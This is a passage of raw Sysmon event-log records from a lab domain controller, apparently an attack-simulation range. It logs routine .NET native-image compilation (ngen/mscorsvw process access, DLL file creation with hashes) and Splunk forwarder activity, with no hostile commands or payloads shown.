Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E35AA0765AAF2A62DE4E6926DCCB348D,SHA256=4C363BA10FC44F487F10C2F0B79F58D7EF7D3C5241DD48EF70F262D53B314EF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.243{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A139-60D3-B002-00000000CF01}1176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.228{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A139-60D3-B002-00000000CF01}1176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.228{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A139-60D3-B002-00000000CF01}1176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.165{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A139-60D3-AF02-00000000CF01}6696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A139-60D3-AF02-00000000CF01}6696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.150{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A139-60D3-AF02-00000000CF01}6696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.072{4DB9351A-A138-60D3-AE02-00000000CF01}6772NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VBCPC7HHRJ\System.Web.DynamicData.Design.ni.dll.auxMD5=7411A37BE63B5304E6165D1602AC946D,SHA256=29C5CCE66171CD6180E387917A39CDBBA51C8949ABB58962D882BBEF2443E290,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.056{4DB9351A-A138-60D3-AE02-00000000CF01}6772NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VBCPC7HHRJ\System.Web.DynamicData.Design.ni.dllMD5=DA77F7BC5C7BA3BA3DDBC63CA462B62D,SHA256=0465F7A0D59262458766B192A1E78632304161F2BE1738B512E205992FBFFB49,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:45.049{4DB9351A-A138-60D3-AE02-00000000CF01}6772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a74-0\System.Web.DynamicData.Design.dll2021-06-23 21:01:45.049 23542300x800000000000000019209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.962{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=050B23643C4DF58FE2EDE5C7C8F0DF23,SHA256=7F0D42BED428F8CAA87F0B528750EB3C38A7440D0762E31C52822CF29D849D16,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.203{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61375-false10.0.1.12-8000- 23542300x800000000000000019207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.947{4DB9351A-A13A-60D3-B502-00000000CF01}6592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EN8D4AZ5KR\System.Web.Extensions.Design.ni.dll.auxMD5=5C6EBD515D79DA98F180A67AD4F7C671,SHA256=5498841C007742257510FC1E67CC64F6DE5CB4099E96F36DA3262878E5508397,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.947{4DB9351A-A13A-60D3-B502-00000000CF01}6592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EN8D4AZ5KR\System.Web.Extensions.Design.ni.dllMD5=562C4CB533828D09FD3D8B6C43166FD2,SHA256=EFEF7FD1E49CD41432D7677D7286BB9AE05409BED1573C38A840E414028F4849,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:46.915{4DB9351A-A13A-60D3-B502-00000000CF01}6592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\19c0-0\System.Web.Extensions.Design.dll2021-06-23 21:01:46.915 23542300x800000000000000019204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.556{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19130A299F05F60DD5B5E85E2D32EF09,SHA256=2C14829155FA473511EA3E52D1B895134345FA609EBCC7F6EDAD7A3DB013EB6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.368{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13A-60D3-B502-00000000CF01}6592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.353{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13A-60D3-B502-00000000CF01}6592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.353{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13A-60D3-B502-00000000CF01}6592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13A-60D3-B402-00000000CF01}5328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.212{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13A-60D3-B402-00000000CF01}5328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.212{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13A-60D3-B402-00000000CF01}5328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.088{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13A-60D3-B302-00000000CF01}5748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.056{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13A-60D3-B302-00000000CF01}5748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.056{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13A-60D3-B302-00000000CF01}5748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.993{4DB9351A-A139-60D3-B202-00000000CF01}4152NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\X08IQRKSBG\System.Web.Entity.Design.ni.dll.auxMD5=0579001CA4D2CFCBB305EEB80FCC2F46,SHA256=49133F4237934A873AFFF09ECAD48B6C366D418508EE83420E1897C7703C90A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.993{4DB9351A-A139-60D3-B202-00000000CF01}4152NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\X08IQRKSBG\System.Web.Entity.Design.ni.dllMD5=8CE96DBC36476037D0ECA751F5CC8E77,SHA256=214D9DEE07FBD80A83B3903E57B0CAFE751B397B3EB9AD2321E36634633E28CA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000019215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.243{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.228{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.228{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.040{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13B-60D3-B602-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.025{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13B-60D3-B602-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 